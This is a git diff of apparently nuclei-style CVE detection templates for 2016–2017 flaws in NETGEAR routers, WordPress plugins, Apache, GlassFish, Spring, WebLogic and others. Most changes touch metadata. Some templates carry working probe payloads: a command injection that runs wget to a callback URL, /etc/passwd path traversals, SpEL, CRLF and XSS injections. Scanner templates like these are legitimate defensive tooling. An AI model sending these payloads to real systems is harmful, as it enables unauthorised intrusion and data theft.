b/cves/2016/CVE-2016-10960.yaml index 7d70ef5104..2f47dc4085 100644 --- a/cves/2016/CVE-2016-10960.yaml +++ b/cves/2016/CVE-2016-10960.yaml @@ -1,20 +1,21 @@ id: CVE-2016-10960 info: - name: wSecure Lite < 2.4 - Remote Code Execution (RCE) + name: WordPress wSecure Lite < 2.4 - Remote Code Execution author: daffainfo severity: high - description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter. + description: WordPress wsecure plugin before 2.4 is susceptible to remote code execution via shell metacharacters in the wsecure-config.php publish parameter. reference: - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/ - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960 - tags: cve,cve2016,wordpress,wp-plugin,rce + - https://wordpress.org/plugins/wsecure/#developers classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.80 + cvss-score: 8.8 cve-id: CVE-2016-10960 cwe-id: CWE-20 + tags: cve,cve2016,wordpress,wp-plugin,rce requests: - method: POST @@ -32,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/12 diff --git a/cves/2016/CVE-2016-10993.yaml b/cves/2016/CVE-2016-10993.yaml index 0f3716e9fe..4d4d53806e 100644 --- a/cves/2016/CVE-2016-10993.yaml +++ b/cves/2016/CVE-2016-10993.yaml @@ -4,16 +4,17 @@ info: name: ScoreMe Theme - Unauthenticated Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: The ScoreMe theme through 2016-04-01 for WordPress has XSS via the s parameter. reference: - https://www.vulnerability-lab.com/get_content.php?id=1808 - https://nvd.nist.gov/vuln/detail/CVE-2016-10993 - tags: cve,cve2016,wordpress,wp-theme,xss + - https://wpvulndb.com/vulnerabilities/8431 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.40 + cvss-score: 5.4 cve-id: CVE-2016-10993 cwe-id: CWE-79 - description: "The ScoreMe theme through 2016-04-01 for WordPress has XSS via the s parameter." + tags: cve,cve2016,wordpress,wp-theme,xss requests: - method: GET diff --git a/cves/2016/CVE-2016-1555.yaml b/cves/2016/CVE-2016-1555.yaml new file mode 100644 index 0000000000..0afd89e84c --- /dev/null +++ b/cves/2016/CVE-2016-1555.yaml @@ -0,0 +1,36 @@ +id: CVE-2016-1555 + +info: + name: NETGEAR WNAP320 Access Point Firmware - Remote Command Injection + author: gy741 + severity: critical + description: NETGEAR WNAP320 Access Point Firmware version 2.0.3 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + reference: + - https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE + - https://nvd.nist.gov/vuln/detail/CVE-2016-1555 + - https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic + - http://seclists.org/fulldisclosure/2016/Feb/112 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2016-1555 + cwe-id: CWE-77 + tags: netgear,rce,oast,router + +requests: + - raw: + - | + POST /boardDataWW.php HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + +# Enhanced by mp on 2022/05/10 diff --git a/cves/2016/CVE-2016-2004.yaml b/cves/2016/CVE-2016-2004.yaml index 8111ac538d..fc2306739b 100644 --- a/cves/2016/CVE-2016-2004.yaml +++ b/cves/2016/CVE-2016-2004.yaml @@ -1,19 +1,21 @@ id: CVE-2016-2004 info: - name: HP Data Protector A.09.00 - Arbitrary Command Execution + name: HP Data Protector - Arbitrary Command Execution author: pussycat0x severity: critical - tags: cve,cve2016,network,iot,hp,rce description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623. reference: - https://www.exploit-db.com/exploits/39858 - https://nvd.nist.gov/vuln/detail/CVE-2016-2004 + - http://www.kb.cert.org/vuls/id/267328 + - https://www.exploit-db.com/exploits/39858/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2016-2004 cwe-id: CWE-306 + tags: cve,cve2016,network,iot,hp,rce network: - inputs: @@ -22,10 +24,12 @@ network: host: - "{{Hostname}}" - - "{{Hostname}}:5555" + - "{{Host}}:5555" matchers: - type: word encoding: hex words: - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" # authority\system + +# Enhanced by mp on 2022/05/10 diff --git a/cves/2016/CVE-2016-2389.yaml b/cves/2016/CVE-2016-2389.yaml index 364e21e9ba..33b554b186 100644 --- a/cves/2016/CVE-2016-2389.yaml +++ b/cves/2016/CVE-2016-2389.yaml @@ -8,12 +8,14 @@ info: reference: - https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/ - https://www.cvedetails.com/cve/CVE-2016-2389 - tags: cve,cve2016,lfi,sap + - http://packetstormsecurity.com/files/137046/SAP-MII-15.0-Directory-Traversal.html + - https://www.exploit-db.com/exploits/39837/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2016-2389 cwe-id: CWE-22 + tags: cve,cve2016,lfi,sap requests: - method: GET @@ -25,7 +27,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2016/CVE-2016-3081.yaml b/cves/2016/CVE-2016-3081.yaml index 86662795dc..580529199e 100644 --- a/cves/2016/CVE-2016-3081.yaml +++ b/cves/2016/CVE-2016-3081.yaml @@ -9,12 +9,13 @@ info: reference: - https://cwiki.apache.org/confluence/display/WW/S2-032 - https://struts.apache.org/docs/s2-032.html - tags: cve,cve2016,struts,rce,apache + - http://www.securitytracker.com/id/1035665 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.10 + cvss-score: 8.1 cve-id: CVE-2016-3081 cwe-id: CWE-77 + tags: cve,cve2016,struts,rce,apache requests: - raw: diff --git a/cves/2016/CVE-2016-3088.yaml b/cves/2016/CVE-2016-3088.yaml index 1a43f975db..ba3b0c90c9 100644 --- a/cves/2016/CVE-2016-3088.yaml +++ b/cves/2016/CVE-2016-3088.yaml @@ -1,21 +1,21 @@ id: CVE-2016-3088 info: - name: ActiveMQ Arbitrary File Write Vulnerability (CVE-2016-3088) + name: Apache ActiveMQ Fileserver - Arbitrary File Write author: fq_hsu severity: critical - description: The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request. + description: Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request via the Fileserver web application. reference: - https://www.exploit-db.com/exploits/40857 - https://medium.com/@knownsec404team/analysis-of-apache-activemq-remote-code-execution-vulnerability-cve-2016-3088-575f80924f30 - http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt - https://nvd.nist.gov/vuln/detail/CVE-2016-3088 - tags: fileupload,cve,cve2016,apache,activemq classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2016-3088 cwe-id: CWE-20 + tags: fileupload,cve,cve2016,apache,activemq requests: - raw: @@ -38,3 +38,5 @@ requests: - "status_code_2==200" - "contains((body_2), '{{randstr}}')" condition: and + +# Enhanced by mp on 2022/04/22 diff --git a/cves/2016/CVE-2016-3978.yaml b/cves/2016/CVE-2016-3978.yaml new file mode 100644 index 0000000000..601462cf16 --- /dev/null +++ b/cves/2016/CVE-2016-3978.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-3978 + +info: + name: FortiOS (Fortinet) - Open Redirect and XSS + author: 0x_Akoko + severity: medium + description: The Web User Interface (WebUI) in FortiOS 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting (XSS) attacks via the "redirect" parameter to "login." + reference: + - https://seclists.org/fulldisclosure/2016/Mar/68 + - https://nvd.nist.gov/vuln/detail/CVE-2016-3978 + - http://seclists.org/fulldisclosure/2016/Mar/68 + - http://www.fortiguard.com/advisory/fortios-open-redirect-vulnerability + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2016-3978 + cwe-id: CWE-79 + tags: cve,cve2016,redirect,fortinet,fortios + +requests: + - method: GET + path: + - '{{BaseURL}}/login?redir=http://www.example.com' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/cves/2016/CVE-2016-4975.yaml b/cves/2016/CVE-2016-4975.yaml index 1bc031521f..ad77d61eda 100644 --- a/cves/2016/CVE-2016-4975.yaml +++ b/cves/2016/CVE-2016-4975.yaml @@ -2,23 +2,28 @@ id: CVE-2016-4975 info: name: Apache mod_userdir CRLF injection - author: melbadry9,nadino,xElkomy,sullo - severity: low + author: melbadry9,nadino,xElkomy + severity: medium description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir. - tags: crlf,generic,cves,cve2016 + reference: + - https://httpd.apache.org/security/vulnerabilities_22.html#CVE-2016-4975 + - https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2016-4975 + remediation: Upgrade to Apache HTTP Server 2.2.32/2.4.25 or higher. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-4975 cwe-id: CWE-93 + tags: cve,cve2016,crlf,generic,apache requests: - method: GET path: - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" - matchers: - type: regex + part: header regex: - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' - part: header + +# Enhanced by cs on 2022/02/14 diff --git a/cves/2016/CVE-2016-4977.yaml b/cves/2016/CVE-2016-4977.yaml new file mode 100644 index 0000000000..48ee87dc33 --- /dev/null +++ b/cves/2016/CVE-2016-4977.yaml @@ -0,0 +1,37 @@ +id: CVE-2016-4977 + +info: + name: Spring Security OAuth2 Remote Command Execution + author: princechaddha + severity: high + description: Spring Security OAuth versions 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5 contain a remote command execution vulnerability. When processing authorization requests using the whitelabel views, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote command execution via the crafting of the value for response_type. + reference: + - https://github.com/vulhub/vulhub/blob/master/spring/CVE-2016-4977/README.md + - https://tanzu.vmware.com/security/cve-2016-4977 + - https://nvd.nist.gov/vuln/detail/CVE-2016-4977 + - https://pivotal.io/security/cve-2016-4977 + remediation: Users of 1.0.x should not use whitelabel views for approval and error pages. Users of 2.0.x should either not use whitelabel views for approval and error pages or upgrade to 2.0.10 or later. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2016-4977 + cwe-id: CWE-19 + tags: cve,cve2016,spring,oauth2,oauth,rce,ssti + +requests: + - method: GET + path: + - "{{BaseURL}}/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Unsupported response types: [978015547]" + + - type: status + status: + - 400 + +# Enhanced by mp on 2022/04/04 diff --git a/cves/2016/CVE-2016-5649.yaml b/cves/2016/CVE-2016-5649.yaml index 40868caf7e..6940b6d489 100644 --- a/cves/2016/CVE-2016-5649.yaml +++ b/cves/2016/CVE-2016-5649.yaml @@ -4,14 +4,17 @@ info: name: NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure author: suman_kar severity: critical - description: A vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface. - tags: cve,cve2016,iot,netgear,router - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-5649 + description: NETGEAR DGN2200 / DGND3700 is susceptible to a vulnerability within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-5649 + - https://packetstormsecurity.com/files/140342/Netgear-DGN2200-DGND3700-WNDR4500-Information-Disclosure.html + - http://packetstormsecurity.com/files/152675/Netgear-DGN2200-DGND3700-Admin-Password-Disclosure.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2016-5649 cwe-id: CWE-200 + tags: cve,cve2016,iot,netgear,router requests: - raw: @@ -38,3 +41,5 @@ requests: group: 1 regex: - 'Success "([a-z]+)"' + +# Enhanced by mp on 2022/05/10 diff --git a/cves/2016/CVE-2016-6210.yaml b/cves/2016/CVE-2016-6210.yaml index 2b99ccba61..45d87300e4 100644 --- a/cves/2016/CVE-2016-6210.yaml +++ b/cves/2016/CVE-2016-6210.yaml @@ -4,7 +4,6 @@ info: name: OpenSSH username enumeration < v7.3 author: iamthefrogy,forgedhallpass severity: medium - tags: network,openssh description: OpenSSH before 7.3 is vulnerable to username enumeration and DoS vulnerabilities. reference: - http://seclists.org/fulldisclosure/2016/Jul/51 @@ -16,17 +15,19 @@ info: cvss-score: 5.9 cve-id: CVE-2016-6210 cwe-id: CWE-200 + tags: cve,cve2016,network,openssh network: - host: - "{{Hostname}}" - - "{{Hostname}}:22" + - "{{Host}}:22" + matchers: - type: regex regex: - - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-2][^\d][^\r]+)' + - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][\n^\r]+)' extractors: - type: regex regex: - - '(?i)SSH-2.0-OpenSSH_[^\r]+' \ No newline at end of file + - '(?i)SSH-2.0-OpenSSH_[^\r\n]+' \ No newline at end of file diff --git a/cves/2016/CVE-2016-6277.yaml b/cves/2016/CVE-2016-6277.yaml index fd2ae09625..3ad1202ab8 100644 --- a/cves/2016/CVE-2016-6277.yaml +++ b/cves/2016/CVE-2016-6277.yaml @@ -5,15 +5,17 @@ info: author: pikpikcu severity: high description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/. - tags: cve,cve2016,netgear,rce,iot reference: - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ - https://nvd.nist.gov/vuln/detail/CVE-2016-6277 + - http://www.sj-vs.net/a-temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ + - https://www.kb.cert.org/vuls/id/582384 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 8.80 + cvss-score: 8.8 cve-id: CVE-2016-6277 cwe-id: CWE-352 + tags: cve,cve2016,netgear,rce,iot requests: - method: GET @@ -25,7 +27,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2016/CVE-2016-7552.yaml b/cves/2016/CVE-2016-7552.yaml index 0e56752878..e8000d4ef0 100644 --- a/cves/2016/CVE-2016-7552.yaml +++ b/cves/2016/CVE-2016-7552.yaml @@ -1,17 +1,21 @@ id: CVE-2016-7552 info: - name: Trend Micro Threat Discovery Appliance Auth Bypass via Directory Traversal + name: Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass author: dwisiswant0 severity: critical - description: On the Trend Micro Threat Discovery Appliance 2.6.1062r1, directory traversal when processing a session_id cookie allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS. - reference: https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4 - tags: cve,cve2016,lfi + description: Trend Micro Threat Discovery Appliance 2.6.1062r1 is vulnerable to a directory traversal vulnerability when processing a session_id cookie, which allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS. + reference: + - https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4 + - https://nvd.nist.gov/vuln/detail/CVE-2016-7552 + - https://github.com/rapid7/metasploit-framework/pull/8216/commits/0f07875a2ddb0bfbb4e985ab074e9fc56da1dcf6 + - http://www.securityfocus.com/bid/97599 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2016-7552 cwe-id: CWE-22 + tags: cve,cve2016,lfi,auth,bypass requests: - method: GET @@ -28,3 +32,5 @@ requests: words: - "Memory map" part: body + +# Enhanced by mp on 2022/05/10 diff --git a/cves/2016/CVE-2016-7981.yaml b/cves/2016/CVE-2016-7981.yaml index a15b21c00b..645a590895 100644 --- a/cves/2016/CVE-2016-7981.yaml +++ b/cves/2016/CVE-2016-7981.yaml @@ -6,13 +6,17 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in valider_xml.php in SPIP 3.1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action. - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-7981 - tags: cve,cve2016,xss,spip + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-7981 + - https://core.spip.net/projects/spip/repository/revisions/23202 + - https://core.spip.net/projects/spip/repository/revisions/23201 + - https://core.spip.net/projects/spip/repository/revisions/23200 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-7981 cwe-id: CWE-79 + tags: cve,cve2016,xss,spip requests: - method: GET diff --git a/cves/2016/CVE-2016-8527.yaml b/cves/2016/CVE-2016-8527.yaml index 69e67cefdf..3ccefee48d 100644 --- a/cves/2016/CVE-2016-8527.yaml +++ b/cves/2016/CVE-2016-8527.yaml @@ -8,12 +8,14 @@ info: reference: - https://www.exploit-db.com/exploits/41482 - https://nvd.nist.gov/vuln/detail/CVE-2016-8527 - tags: cve,cve2016,aruba,xss + - http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2017-001.txt + - https://www.exploit-db.com/exploits/41482/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-8527 cwe-id: CWE-79 + tags: cve,cve2016,aruba,xss requests: - method: GET diff --git a/cves/2017/CVE-2017-0929.yaml b/cves/2017/CVE-2017-0929.yaml index bd7c9bcac5..af5cd151de 100644 --- a/cves/2017/CVE-2017-0929.yaml +++ b/cves/2017/CVE-2017-0929.yaml @@ -8,12 +8,13 @@ info: reference: - https://hackerone.com/reports/482634 - https://nvd.nist.gov/vuln/detail/CVE-2017-0929 + - https://github.com/dnnsoftware/Dnn.Platform/commit/d3953db85fee77bb5e6383747692c507ef8b94c3 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2017-0929 cwe-id: CWE-918 - tags: cve,cve2017,oast,ssrf,dnn + tags: cve,cve2017,oast,ssrf,dnn,dotnetnuke requests: - method: GET @@ -29,4 +30,4 @@ requests: - type: status status: - - 500 \ No newline at end of file + - 500 diff --git a/cves/2017/CVE-2017-1000028.yaml b/cves/2017/CVE-2017-1000028.yaml index c1eb936feb..c91556d3c0 100644 --- a/cves/2017/CVE-2017-1000028.yaml +++ b/cves/2017/CVE-2017-1000028.yaml @@ -2,28 +2,40 @@ id: CVE-2017-1000028 info: name: GlassFish LFI - author: pikpikcu + author: pikpikcu,daffainfo severity: high description: Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request. - reference: https://www.exploit-db.com/exploits/45196 - tags: cve,cve2017,oracle,glassfish,lfi + reference: + - https://www.exploit-db.com/exploits/45196 + - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18822 + - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904 + - https://www.exploit-db.com/exploits/45196/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2017-1000028 cwe-id: CWE-22 + tags: cve,cve2017,oracle,glassfish,lfi requests: - method: GET path: - "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" - matchers-condition: and - matchers: - - type: word - words: - - "/sbin/nologin" - part: body + - "{{BaseURL}}/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini" - - type: status - status: - - 200 \ No newline at end of file + stop-at-first-match: true + matchers-condition: or + matchers: + - type: dsl + dsl: + - "regex('root:.*:0:0:', body)" + - "status_code == 200" + condition: and + + - type: dsl + dsl: + - "contains(body, 'bit app support')" + - "contains(body, 'fonts')" + - "contains(body, 'extensions')" + - "status_code == 200" + condition: and diff --git a/cves/2017/CVE-2017-1000029.yaml b/cves/2017/CVE-2017-1000029.yaml new file mode 100644 index 0000000000..de88a3a80b --- /dev/null +++ b/cves/2017/CVE-2017-1000029.yaml @@ -0,0 +1,32 @@ +id: CVE-2017-1000029 + +info: + name: GlassFish Server Open Source Edition 3.0.1 - LFI + author: 0x_Akoko + severity: high + description: Oracle, GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to Local File Inclusion vulnerability, that makes it possible to include arbitrary files on the server, this vulnerability can be exploited without any prior authentication. + reference: + - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18784 + - https://www.cvedetails.com/cve/CVE-2017-1000029 + - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-011/?fid=8037 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2017-1000029 + cwe-id: CWE-200 + tags: cve,cve2017,glassfish,oracle,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/resource/file%3a///etc/passwd/" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0:" + + - type: status + status: + - 200 diff --git a/cves/2017/CVE-2017-1000170.yaml b/cves/2017/CVE-2017-1000170.yaml index ef6415afce..1ef12d6aae 100644 --- a/cves/2017/CVE-2017-1000170.yaml +++ b/cves/2017/CVE-2017-1000170.yaml @@ -4,14 +4,17 @@ info: name: WordPress Plugin Delightful Downloads Jquery File Tree 2.1.5 Path Traversal author: dwisiswant0 severity: high - reference: https://www.exploit-db.com/exploits/49693 description: jqueryFileTree 2.1.5 and older Directory Traversal - tags: cve,cve2017,wordpress,wp-plugin,lfi + reference: + - https://www.exploit-db.com/exploits/49693 + - https://github.com/jqueryfiletree/jqueryfiletree/issues/66 + - http://packetstormsecurity.com/files/161900/WordPress-Delightful-Downloads-Jquery-File-Tree-1.6.6-Path-Traversal.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2017-1000170 cwe-id: CWE-22 + tags: cve,cve2017,wordpress,wp-plugin,lfi,jquery requests: - method: POST @@ -28,4 +31,4 @@ requests: part: body - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cves/2017/CVE-2017-1000486.yaml b/cves/2017/CVE-2017-1000486.yaml index d7a07c5e57..703697b544 100644 --- a/cves/2017/CVE-2017-1000486.yaml +++ b/cves/2017/CVE-2017-1000486.yaml @@ -1,21 +1,21 @@ id: CVE-2017-1000486 info: - name: Primetek Primefaces 5.x EL Injection - RCE + name: Primetek Primefaces 5.x - Remote Code Execution author: Moritz Nentwig severity: critical - description: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution + description: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution. reference: - https://github.com/mogwailabs/CVE-2017-1000486 - https://github.com/pimps/CVE-2017-1000486 - https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html - https://nvd.nist.gov/vuln/detail/CVE-2017-1000486 - tags: cve,cve2017,primetek,rce classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2017-1000486 cwe-id: CWE-326 + tags: cve,cve2017,primetek,rce,injection requests: - raw: @@ -32,4 +32,6 @@ requests: - type: word words: - 'Mogwailabs: CHECKCHECK' - part: header \ No newline at end of file + part: header + +# Enhanced by mp on 2022/05/10 diff --git a/cves/2017/CVE-2017-10075.yaml b/cves/2017/CVE-2017-10075.yaml index 3083d00632..d5bb533add 100644 --- a/cves/2017/CVE-2017-10075.yaml +++ b/cves/2017/CVE-2017-10075.yaml @@ -1,16 +1,19 @@ id: CVE-2017-10075 info: - name: Oracle Content Server XSS + name: Oracle Content Server Cross-Site Scripting author: madrobot severity: high - description: The vulnerability can be used to include HTML or JavaScript code in the affected web page. The code is executed in the browser of users if they visit the manipulated site. - reference: http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html - tags: cve,cve2017,xss,oracle + description: Oracle Content Server version 11.1.1.9.0, 12.2.1.1.0 and 12.2.1.2.0 are susceptible to cross-site scripting. The vulnerability can be used to include HTML or JavaScript code in the affected web page. The code is executed in the browser of users if they visit the manipulated site. + reference: + - http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html + - https://nvd.nist.gov/vuln/detail/CVE-2017-10075 + - http://www.securitytracker.com/id/1038940 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N - cvss-score: 8.20 + cvss-score: 8.2 cve-id: CVE-2017-10075 + tags: cve,cve2017,xss,oracle requests: - method: GET @@ -27,3 +30,5 @@ requests: words: - "" part: body + +# Enhanced by mp on 2022/04/12 diff --git a/cves/2017/CVE-2017-10271.yaml b/cves/2017/CVE-2017-10271.yaml index 4af42b1f0f..af77696479 100644 --- a/cves/2017/CVE-2017-10271.yaml +++ b/cves/2017/CVE-2017-10271.yaml @@ -1,18 +1,20 @@ id: CVE-2017-10271 info: - name: CVE-2017-10271 + name: Oracle Fusion Middleware WebLogic Server - Remote Command Execution author: dr_set severity: high - description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. + description: The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security) is susceptible to component deserialization remote command execution. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Unauthenticated attackers with network access via T3 can leverage this vulnerability to compromise Oracle WebLogic Server. reference: - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271 - https://github.com/SuperHacker-liuan/cve-2017-10271-poc - tags: cve,cve2017,rce,oracle,weblogic,oast + - https://www.oracle.com/security-alerts/cpuoct2017.html + - https://nvd.nist.gov/vuln/detail/CVE-2017-10271 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2017-10271 + tags: cve,cve2017,rce,oracle,weblogic,oast requests: - raw: @@ -52,10 +54,12 @@ requests: matchers-condition: and matchers: - type: word - part: 